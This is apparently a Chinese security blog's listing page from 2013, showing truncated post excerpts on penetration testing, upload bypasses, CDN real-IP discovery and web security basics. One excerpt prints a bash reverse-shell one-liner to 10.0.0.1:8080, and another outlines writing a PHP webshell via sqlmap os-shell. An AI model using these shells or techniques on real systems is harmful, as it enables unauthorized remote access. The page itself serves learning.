网络知识

admin 12年前 (2013-07-30) 2852浏览 1评论

今天看到了一篇文章：百度网盘音乐外链源码，感触颇多。文章讲解了如何获取百度网盘的音乐文件的外链地址，即创建分享链接然后从分享链接的源码中获取音乐文件的外链地址。详细内容如下： —————&#...

admin 12年前 (2013-07-29) 6440浏览 0评论

前几天为虚拟机代理上网的问题烦恼了一下：不知什么原因，NAT方式不能上网，只能选择桥接方式。因此，如果想要虚拟机代理上网，必须在虚拟机中设置VPN(设置过程参考以前的文章)。 今天，看到一篇文章《主机使用无线网卡Vmware虚拟机网络设置——Brid...

admin 12年前 (2013-07-28) 7562浏览 0评论

一、注入时，如果注入权限够大，通过sqlmap可以获取到os-shell，这时，如果知道网站路径的话，就可以通过命令将webshell写入到网站目录下，这样就获取到webshell了。 利用命令注入写一句话php webshell到web目录涉及到一...

admin 12年前 (2013-07-28) 5253浏览 1评论

说明：虾米音乐下载地址使用凯撒阵列加密，eaglephp里集成了该加密方法的破解算法（解密算法在EaglePHP/APP/Api/XiamiController.class.php 类）。 下面的获取虾米下载地址的过程是参考网络，先讲一下我一步步的实...

admin 12年前 (2013-07-25) 14588浏览 2评论

首先要明确\00截断与%00截断的关系：00截断就是将上传文件的文件名或路径名中使用ascii码值为0的字符进行截断来达到突破上传限制的目的，而%00一般用在URL中用于截断url来进行文件包含。两者之间的关系是：%00是ascii值为0字符的url...

admin 12年前 (2013-07-25) 17290浏览 0评论

今天想通过kali linux里的 wpscan来扫一个wordpress站点。不知什么原因虚拟机不能使用NAT，所以只能在虚拟机中设置VPN代理才能访问了。 下面讲解一下设置过程，以咨以后查阅: 进入kali linux可以在右上角看到一个显示器的...

admin 12年前 (2013-07-24) 2823浏览 1评论

近日需要不同的编码，关于上述编码,一直迷迷糊糊,查了些资料,总算大致了解了, 下面全是从网上搜来的： 1.  ASCII和Ansi编码 字符内码(charcter code)指的是用来代表字符的内码.读者在输入和存储文档时都要使用内码,内码分为 单字...

admin 12年前 (2013-07-22) 1720浏览 0评论

这是去年写的一篇文章http://lcx.cc/?i=2484，转过来了，如有不妥，还请指正。 刚才看到乌云有人发帖问：网上流传的修改来电的软件实现原理是什么？ 关于这个东西，我还真了解一点（本人涉猎甚广，啥都喜欢研究一番）…… 其实很多年前就有...

admin 12年前 (2013-07-22) 1606浏览 0评论

层叠样式表（css） 调用方式有三种： 1 用<style> 2 通过<link rel=stylesheet>，或者使用style参数。 3 XML（包括XHTML）可以通过<?xml-stylesheet h...

admin 12年前 (2013-07-22) 1520浏览 0评论

同源策略 同源策略的文档模型 同源策略（Same Origin policy，SOP），也称为单源策略（Single Origin policy），它是一种用于Web浏览器编程语言（如JavaScript和Ajax）的安全措施，以保护信息的保密性...

admin 12年前 (2013-07-17) 1717浏览 0评论

bash版本： bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ，注意某些linux不支持 perl版本: perl -e 'use Socket;$i="10.0.0.1";$p=1234;...

admin 12年前 (2013-07-16) 1792浏览 0评论

关于如何查找“CDN”真实IP地址的方法 现在很多网站用了cdn技术，在做一些测试的时候，想获取其服务器真实IP地址就有点困难，不知道现在还有其他什么好的方法呢，整理了下，目前知道如下两种： 1：拿CDN服务器 找出真实IP cache_peer 1...

admin 12年前 (2013-07-08) 1681浏览 1评论

作者： 阮一峰 日期： 2010年2月11日 一、问题的由来 URL就是网址，只要上网，就一定会用到。 一般来说，URL只能使用英文字母、阿拉伯数字和某些标点符号，不能使用其他文字和符号。比如，世界上有英文字母的网址 “http://www.a...

admin 12年前 (2013-07-07) 1573浏览 0评论

核心总结：php-fpm/apache 进程所使用的用户，不能是网站文件所有者。 凡是违背这个原则，则不符合最小权限原则。 根据生产环境不断反馈，发现不断有 php网站被挂木马，绝大部分原因是因为权限设置不合理造成。因为服务器软件，或是 php 程序...

admin 12年前 (2013-07-03) 1812浏览 0评论

重要的4个规则： 1 &符号不应该出现在HTML的大部分节点中。 2 尖括号<>是不应该出现在标签内的，除非为引号引用。 3 在text节点里面，<左尖括号有很大的危害。 4 引号在标签内可能有危害，具体危害取决于存...

admin 12年前 (2013-07-03) 2120浏览 4评论

转自乌云知识库：http://drops.wooyun.org 2013/06/19 18:54 | 瞌睡龙 | 漏洞分析 | 占个座先 URL格式： scheme://[login[:password]@](host_name|host_addr...

admin 12年前 (2013-07-03) 1278浏览 0评论

Google的技术项目经理John Munoz日前在Google官方博客发布了一篇文章，讲解如何保护WiFi无线网络安全，鉴于家庭WiFi网络已经非常普遍，如何防止周围邻居通过WiFi攻击你的家庭网络也成为一个现实的问题，这篇文章讲述了提升WiFi网...

admin 12年前 (2013-06-30) 1618浏览 0评论

互联网中充斥着无数个链接，我们每天上网所做的事情，就是点开一个链接，跳转到另外一个链接。可你知道你点开的这些链接在背后里都做了些什么见不得 人的事情么？   国内的大多数网民,都习惯了腾讯为他们做好的大局域网，用QQ聊天、用QQ邮箱收发邮件...

admin 12年前 (2013-06-30) 12235浏览 0评论

VPN真的安全吗？说起这个话题，读者们可能就要和GFW,翻墙联系在一起了。在没有确切实验和证据之下，我还是相信VPN是一款不错的安全产品， 毕竟他是走的加密通道。但是今天发现的一件事让我对此稍有恐惧，在信息安全如此重视的年代，vpn这个号称加密隧道也...

admin 12年前 (2013-06-28) 2053浏览 0评论

1、前言 在渗透测试中我们的首要任务就是收集信息,那么通过网络指纹识别那是比不缺少的一个环节。下面我们就来介绍几种常见网络识别方法。 2.1 Netcat 如果我们要知道一台服务器是采用什么作为http服务器,那么netcat就是一个不错的选择。 r...